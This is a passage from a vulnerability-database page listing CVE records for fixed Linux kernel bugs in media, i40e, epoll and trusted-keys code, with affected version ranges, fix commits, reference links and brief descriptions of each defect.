            "url": "https://git.kernel.org/stable/c/bee9440bc0b6b3b7432f7bfde28656262a3484a2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a9d420149c477e7c97fbd6453704e4612bdd3fa"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/mc/mc-entity.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "788fd0f11e45ae8d3a8ebbd3452a6e83f92db376",
              "status": "affected",
              "version": "ae219872834a32da88408a92a4b4745c11f5a7ce",
              "versionType": "git"
            },
            {
              "lessThan": "e80d9db99b7b6c697d8d952dfd25c3425cf61499",
              "status": "affected",
              "version": "ae219872834a32da88408a92a4b4745c11f5a7ce",
              "versionType": "git"
            },
            {
              "lessThan": "bee9440bc0b6b3b7432f7bfde28656262a3484a2",
              "status": "affected",
              "version": "ae219872834a32da88408a92a4b4745c11f5a7ce",
              "versionType": "git"
            },
            {
              "lessThan": "8a9d420149c477e7c97fbd6453704e4612bdd3fa",
              "status": "affected",
              "version": "ae219872834a32da88408a92a4b4745c11f5a7ce",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/mc/mc-entity.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.1"
            },
            {
              "lessThan": "6.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.94",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.94",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mc: Fix graph walk in media_pipeline_start\n\nThe graph walk tries to follow all links, even if they are not between\npads. This causes a crash with, e.g. a MEDIA_LNK_FL_ANCILLARY_LINK link.\n\nFix this by allowing the walk to proceed only for MEDIA_LNK_FL_DATA_LINK\nlinks."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:42.838Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/788fd0f11e45ae8d3a8ebbd3452a6e83f92db376"
        },
        {
          "url": "https://git.kernel.org/stable/c/e80d9db99b7b6c697d8d952dfd25c3425cf61499"
        },
        {
          "url": "https://git.kernel.org/stable/c/bee9440bc0b6b3b7432f7bfde28656262a3484a2"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a9d420149c477e7c97fbd6453704e4612bdd3fa"
        }
      ],
      "title": "media: mc: Fix graph walk in media_pipeline_start",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39481",
    "datePublished": "2024-07-05T06:55:09.916Z",
    "dateReserved": "2024-06-25T14:23:23.746Z",
    "dateUpdated": "2025-05-04T09:16:42.838Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36020 (GCVE-0-2024-36020)

Vulnerability from cvelistv5 – Published: 2024-05-30 14:59 – Updated: 2025-05-04 12:56

Title

i40e: fix vf may be used uninitialized in this function warning

Summary

In the Linux kernel, the following vulnerability has been resolved: i40e: fix vf may be used uninitialized in this function warning To fix the regression introduced by commit 52424f974bc5, which causes servers hang in very hard to reproduce conditions with resets races. Using two sources for the information is the root cause. In this function before the fix bumping v didn't mean bumping vf pointer. But the code used this variables interchangeably, so stale vf could point to different/not intended vf. Remove redundant "v" variable and iterate via single VF pointer across whole function instead to guarantee VF pointer validity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cc9cd02dd9e8b7764…
	https://git.kernel.org/stable/c/9dcf0fcb80f6aeb01…
	https://git.kernel.org/stable/c/b8e82128b44fa40bf…
	https://git.kernel.org/stable/c/951d2748a2a824285…
	https://git.kernel.org/stable/c/3e89846283f3cf7c7…
	https://git.kernel.org/stable/c/0dcf573f997732702…
	https://git.kernel.org/stable/c/06df7618f591b2dc4…
	https://git.kernel.org/stable/c/f37c4eac99c258111…

Impacted products

Vendor

Product

Version

Linux

Affected: 76ed715836c6994bac29d9638e9314e6e3b08651 , < cc9cd02dd9e8b7764ea9effb24f4f1dd73d1b23d (git)
Affected: e88c2a1e28c5475065563d66c07ca879a9afbd07 , < 9dcf0fcb80f6aeb01469e3c957f8d4c97365450a (git)
Affected: 9abae363af5ced6adbf04c14366289540281fb26 , < b8e82128b44fa40bf99a50b919488ef361e1683c (git)
Affected: c39de3ae5075ea5f78e097cb5720d4e52d5caed9 , < 951d2748a2a8242853abc3d0c153ce4bf8faad31 (git)
Affected: 52424f974bc53c26ba3f00300a00e9de9afcd972 , < 3e89846283f3cf7c7a8e28b342576fd7c561d2ba (git)
Affected: 52424f974bc53c26ba3f00300a00e9de9afcd972 , < 0dcf573f997732702917af1563aa2493dc772fc0 (git)
Affected: 52424f974bc53c26ba3f00300a00e9de9afcd972 , < 06df7618f591b2dc43c59967e294d7b9fc8675b6 (git)
Affected: 52424f974bc53c26ba3f00300a00e9de9afcd972 , < f37c4eac99c258111d414d31b740437e1925b8e8 (git)
Affected: 02f949747e6fb767b29f7931d4bbf40911684e7a (git)

Linux

Affected: 6.1
Unaffected: 0 , < 6.1 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36020",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-03T16:54:29.774868Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:10.052Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.504Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cc9cd02dd9e8b7764ea9effb24f4f1dd73d1b23d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9dcf0fcb80f6aeb01469e3c957f8d4c97365450a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b8e82128b44fa40bf99a50b919488ef361e1683c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/951d2748a2a8242853abc3d0c153ce4bf8faad31"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3e89846283f3cf7c7a8e28b342576fd7c561d2ba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0dcf573f997732702917af1563aa2493dc772fc0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/06df7618f591b2dc43c59967e294d7b9fc8675b6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f37c4eac99c258111d414d31b740437e1925b8e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cc9cd02dd9e8b7764ea9effb24f4f1dd73d1b23d",
              "status": "affected",
              "version": "76ed715836c6994bac29d9638e9314e6e3b08651",
              "versionType": "git"
            },
            {
              "lessThan": "9dcf0fcb80f6aeb01469e3c957f8d4c97365450a",
              "status": "affected",
              "version": "e88c2a1e28c5475065563d66c07ca879a9afbd07",
              "versionType": "git"
            },
            {
              "lessThan": "b8e82128b44fa40bf99a50b919488ef361e1683c",
              "status": "affected",
              "version": "9abae363af5ced6adbf04c14366289540281fb26",
              "versionType": "git"
            },
            {
              "lessThan": "951d2748a2a8242853abc3d0c153ce4bf8faad31",
              "status": "affected",
              "version": "c39de3ae5075ea5f78e097cb5720d4e52d5caed9",
              "versionType": "git"
            },
            {
              "lessThan": "3e89846283f3cf7c7a8e28b342576fd7c561d2ba",
              "status": "affected",
              "version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
              "versionType": "git"
            },
            {
              "lessThan": "0dcf573f997732702917af1563aa2493dc772fc0",
              "status": "affected",
              "version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
              "versionType": "git"
            },
            {
              "lessThan": "06df7618f591b2dc43c59967e294d7b9fc8675b6",
              "status": "affected",
              "version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
              "versionType": "git"
            },
            {
              "lessThan": "f37c4eac99c258111d414d31b740437e1925b8e8",
              "status": "affected",
              "version": "52424f974bc53c26ba3f00300a00e9de9afcd972",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "02f949747e6fb767b29f7931d4bbf40911684e7a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.1"
            },
            {
              "lessThan": "6.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.19.264",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "5.4.223",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.10.153",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15.77",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.0.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni40e: fix vf may be used uninitialized in this function warning\n\nTo fix the regression introduced by commit 52424f974bc5, which causes\nservers hang in very hard to reproduce conditions with resets races.\nUsing two sources for the information is the root cause.\nIn this function before the fix bumping v didn\u0027t mean bumping vf\npointer. But the code used this variables interchangeably, so stale vf\ncould point to different/not intended vf.\n\nRemove redundant \"v\" variable and iterate via single VF pointer across\nwhole function instead to guarantee VF pointer validity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:17.412Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cc9cd02dd9e8b7764ea9effb24f4f1dd73d1b23d"
        },
        {
          "url": "https://git.kernel.org/stable/c/9dcf0fcb80f6aeb01469e3c957f8d4c97365450a"
        },
        {
          "url": "https://git.kernel.org/stable/c/b8e82128b44fa40bf99a50b919488ef361e1683c"
        },
        {
          "url": "https://git.kernel.org/stable/c/951d2748a2a8242853abc3d0c153ce4bf8faad31"
        },
        {
          "url": "https://git.kernel.org/stable/c/3e89846283f3cf7c7a8e28b342576fd7c561d2ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/0dcf573f997732702917af1563aa2493dc772fc0"
        },
        {
          "url": "https://git.kernel.org/stable/c/06df7618f591b2dc43c59967e294d7b9fc8675b6"
        },
        {
          "url": "https://git.kernel.org/stable/c/f37c4eac99c258111d414d31b740437e1925b8e8"
        }
      ],
      "title": "i40e: fix vf may be used uninitialized in this function warning",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36020",
    "datePublished": "2024-05-30T14:59:44.447Z",
    "dateReserved": "2024-05-17T13:50:33.157Z",
    "dateUpdated": "2025-05-04T12:56:17.412Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38580 (GCVE-0-2024-38580)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:37 – Updated: 2026-01-05 10:36

Title

epoll: be better about file lifetimes

Summary

In the Linux kernel, the following vulnerability has been resolved: epoll: be better about file lifetimes epoll can call out to vfs_poll() with a file pointer that may race with the last 'fput()'. That would make f_count go down to zero, and while the ep->mtx locking means that the resulting file pointer tear-down will be blocked until the poll returns, it means that f_count is already dead, and any use of it won't actually get a reference to the file any more: it's dead regardless. Make sure we have a valid ref on the file pointer before we call down to vfs_poll() from the epoll routines.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cbfd1088e24ec4c11…
	https://git.kernel.org/stable/c/559214eb4e5c3d05e…
	https://git.kernel.org/stable/c/4f65f4defe4e23659…
	https://git.kernel.org/stable/c/16e3182f6322575eb…
	https://git.kernel.org/stable/c/4efaa5acf0a1d2b59…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < cbfd1088e24ec4c1199756a37cb8e4cd0a4b016e (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 559214eb4e5c3d05e69428af2fae2691ba1eb784 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 4f65f4defe4e23659275ce5153541cd4f76ce2d2 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 16e3182f6322575eb7c12e728ad3c7986a189d5d (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 4efaa5acf0a1d2b5947f98abb3acf8bfd966422b (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.965Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cbfd1088e24ec4c1199756a37cb8e4cd0a4b016e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/559214eb4e5c3d05e69428af2fae2691ba1eb784"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f65f4defe4e23659275ce5153541cd4f76ce2d2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/16e3182f6322575eb7c12e728ad3c7986a189d5d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4efaa5acf0a1d2b5947f98abb3acf8bfd966422b"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38580",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:13:59.808885Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:55.453Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/eventpoll.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cbfd1088e24ec4c1199756a37cb8e4cd0a4b016e",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "559214eb4e5c3d05e69428af2fae2691ba1eb784",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "4f65f4defe4e23659275ce5153541cd4f76ce2d2",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "16e3182f6322575eb7c12e728ad3c7986a189d5d",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "4efaa5acf0a1d2b5947f98abb3acf8bfd966422b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/eventpoll.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nepoll: be better about file lifetimes\n\nepoll can call out to vfs_poll() with a file pointer that may race with\nthe last \u0027fput()\u0027. That would make f_count go down to zero, and while\nthe ep-\u003emtx locking means that the resulting file pointer tear-down will\nbe blocked until the poll returns, it means that f_count is already\ndead, and any use of it won\u0027t actually get a reference to the file any\nmore: it\u0027s dead regardless.\n\nMake sure we have a valid ref on the file pointer before we call down to\nvfs_poll() from the epoll routines."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:39.198Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cbfd1088e24ec4c1199756a37cb8e4cd0a4b016e"
        },
        {
          "url": "https://git.kernel.org/stable/c/559214eb4e5c3d05e69428af2fae2691ba1eb784"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f65f4defe4e23659275ce5153541cd4f76ce2d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/16e3182f6322575eb7c12e728ad3c7986a189d5d"
        },
        {
          "url": "https://git.kernel.org/stable/c/4efaa5acf0a1d2b5947f98abb3acf8bfd966422b"
        }
      ],
      "title": "epoll: be better about file lifetimes",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38580",
    "datePublished": "2024-06-19T13:37:37.840Z",
    "dateReserved": "2024-06-18T19:36:34.927Z",
    "dateUpdated": "2026-01-05T10:36:39.198Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36975 (GCVE-0-2024-36975)

Vulnerability from cvelistv5 – Published: 2024-06-18 19:20 – Updated: 2025-05-04 09:13

Title

KEYS: trusted: Do not use WARN when encode fails

Summary

In the Linux kernel, the following vulnerability has been resolved: KEYS: trusted: Do not use WARN when encode fails When asn1_encode_sequence() fails, WARN is not the correct solution. 1. asn1_encode_sequence() is not an internal function (located in lib/asn1_encode.c). 2. Location is known, which makes the stack trace useless. 3. Results a crash if panic_on_warn is set. It is also noteworthy that the use of WARN is undocumented, and it should be avoided unless there is a carefully considered rationale to use it. Replace WARN with pr_err, and print the return value instead, which is only useful piece of information.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/96f650995c70237b0…
	https://git.kernel.org/stable/c/681935009fec3fc22…
	https://git.kernel.org/stable/c/1c652e1e10676f942…
	https://git.kernel.org/stable/c/d32c6e09f7c4bec3e…
	https://git.kernel.org/stable/c/ff91cc12faf798f57…
	https://git.kernel.org/stable/c/050bf3c793a07f96b…

Impacted products

Vendor

Product

Version

Linux

Affected: f2219745250f388edacabe6cca73654131c67d0a , < 96f650995c70237b061b497c66755e32908f8972 (git)
Affected: f2219745250f388edacabe6cca73654131c67d0a , < 681935009fec3fc22af97ee312d4a24ccf3cf087 (git)
Affected: f2219745250f388edacabe6cca73654131c67d0a , < 1c652e1e10676f942149052d9329b8bf2703529a (git)
Affected: f2219745250f388edacabe6cca73654131c67d0a , < d32c6e09f7c4bec3ebc4941323f0aa6366bc1487 (git)
Affected: f2219745250f388edacabe6cca73654131c67d0a , < ff91cc12faf798f573dab2abc976c1d5b1862fea (git)
Affected: f2219745250f388edacabe6cca73654131c67d0a , < 050bf3c793a07f96bd1e2fd62e1447f731ed733b (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.160 , ≤ 5.15.* (semver)
Unaffected: 6.1.92 , ≤ 6.1.* (semver)
Unaffected: 6.6.32 , ≤ 6.6.* (semver)
Unaffected: 6.8.11 , ≤ 6.8.* (semver)
Unaffected: 6.9.2 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.595Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/96f650995c70237b061b497c66755e32908f8972"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/681935009fec3fc22af97ee312d4a24ccf3cf087"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1c652e1e10676f942149052d9329b8bf2703529a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d32c6e09f7c4bec3ebc4941323f0aa6366bc1487"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff91cc12faf798f573dab2abc976c1d5b1862fea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/050bf3c793a07f96bd1e2fd62e1447f731ed733b"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36975",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
